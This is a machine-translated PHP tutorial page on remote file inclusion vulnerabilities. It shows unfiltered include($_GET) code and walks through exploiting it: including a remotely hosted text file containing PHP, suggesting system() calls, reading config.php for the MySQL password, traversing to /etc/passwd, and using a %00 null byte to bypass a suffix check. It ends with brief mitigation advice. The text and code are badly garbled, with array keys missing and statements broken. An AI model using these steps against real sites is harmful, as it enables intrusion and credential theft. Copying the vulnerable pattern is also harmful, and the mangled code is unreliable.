What causes PHP Remote file Inclusion Vulnerability Generation _php tutorial

For primary PHPProgrammers, the security of PHP is not fully mastered. First, we need to understand the principle that causes the program to leak. Now let's introduce PHP. remote file contains vulnerabilityThe cause of the production.

The first question is, what is a "remote file Containment vulnerability"? The short answer is that the server through the PHP arbitrary file contains the filter is not strict, to execute a malicious file, which is a programmer filtering problems, please remember that all CGI programs have such a bug.

1. Find out the PHP remote file contains the vulnerability bug:

In order to find the goal, we first need to know the meaning of two words, in all languages (most) have this method contains arbitrary files. In PHP, we use the Include () function, its workflow:

If you include include1.php in main.php, I will write the include ("Include1. PHP "). Not very scientific, but you need to know the truth.

Let's look at this first, and when the user enters it, it includes the file, which is

 
  
  

  
   
   
if ($_get
) { 
  
   
   
Include$_get
; 
  
   
   
Else  { 
  
   
   
Include"home. PHP "; 
  
   
   

 
  
  

This structure is common in dynamic Web sites, and the problem is that it allows such [Url]hxxp://www.target.com/explame. Php?page=main. Php[/url] or [Url]hxxp://www.target.com/explame. Php?page=downloads. Php[/url] to view. Anyway, if your program has such a bug is also very sad, can only blame you, although only a filter problem, but this is the filter has a script hacker. In the zone-h.org survey, the file contains an attack rate of 9.4%, enough to attract attention, And it is not a day or two problems, a few years ago, but to today, a batch of programmers still usual, so there is this article, in 2004 to write such an article has been old, but I still want to write, after all, complaints can make a person's profit when it is not called whining.

2. Testing

Here is a remote file containing examples, the purpose is only one, for your program security, we look at the specific

 
  
  

  
   
   
[url]hxxp://www.target.com/explame.php? page = Zizzy [/url] 
  
   
   

  
   
   
Warning:main (Zizzy): Failed to open stream:no such file or directory 
  
   
   

  
   
   
In/var/www/htdocs/index. PHP on line 3 
  
   
   

  
   
   
Warning:main (): Failed opening ' zizzy ' for inclusion 
  
   
   

  
   
   
(include_path='.:/ Usr/local/lib/php '
 
  
  

PHP output of these error message tells us that the program to include the file/var/www/htdocs/zizzy, but did not find, see, no such file or directory does not have such files, now understand the PHP remote file contains the vulnerability.

3. Use

PHP is really good, can call the file remotely, then I create a yeah.txt, put on my station [Url]hxxp://www.mysite.com/yeah.txt. [/URL] content like this

 
  
  

  
   
   
<? 
  
   
   
echo"wow,test!" ; 
  
   
   

 
  
  

So

echo the wow,test! so that it executes. Read CONFIG. PHP is not difficult, it put the MySQL password ah. Write yeah.txt to see, write System () to try, what feelings, in the excessive point, so submit page=. /.. /.. /.. /.. /.. /.. /etc/passwd. Know what is really contained.

4. Another type of PHP remote file contains the vulnerability principle

Sometimes programmers change the way they are written, which limits the scope of inclusion

 
  
  

  
   
   
if ($_get
) { 
  
   
   
Include"$_get
. PHP "; 
  
   
   
} 
  
   
   
Else 
  
   
   
{ 
  
   
   
Include"home. PHP "; 
  
   
   

 
  
  

We submit

 
  
  

  
   
   
[Url]hxxp://www.target.com/explame.php?pa...e.com/yeah.txt[/url] 
  
   
   

  
   
   
Warning:main ([Url]hxxp://www.mysite.com/yeah.txt.php[/url]): failed to open stream: 
  
   
   

  
   
   
HXXP Request failed! hxxp/1.1 404 Not Found in/var/www/htdocs/explame. PHP on line 3 
  
   
   

  
   
   
Warning:main (): Failed opening ' hxxp://www.mysite.com/yeah.txt.php ' for inclusion 
  
   
   

  
   
   
(include_path='.:/ Usr/local/lib/php '
 
  
  

Contains a failure, restricts the suffix to PHP, changes the mysite.com yeah.txt to yeah.php, and then executes the same. What about the passwd?

 
  
  

  
   
   
Warning:main (.. /.. /.. /.. /.. /.. /.. /etc/passwd. PHP): Failed to open STREAM:HXXP request 
  
   
   

  
   
   
failed! hxxp/1.1 404 Not Found in/var/www/htdocs/explame. PHP on line 3 
  
   
   

  
   
   
Warning:main (): Failed opening '. /.. /.. /.. /.. /.. /.. /etc/passwd. PHP ' for inclusion 
  
   
   

  
   
   
(include_path='.:/ Usr/local/lib/php '
 
  
  

Use a NUL character here, which is the% 00来 skip detection

See it.

It is best to specify which file to include in the file, or to filter the submitted variables, which is the purpose of this PHP remote file contains the vulnerability article, not to the hacking, but to those who are involved in the first programmer, such articles on the Internet a lot, as long as someone benefit, also to achieve the purpose.

http://www.bkjia.com/PHPjc/445831.html www.bkjia.com true http://www.bkjia.com/PHPjc/445831.html techarticle For the novice PHP programmer, the security of PHP is not fully mastered. First, we need to understand the principle that causes the program to leak. Let's introduce the PHP remote file package ...

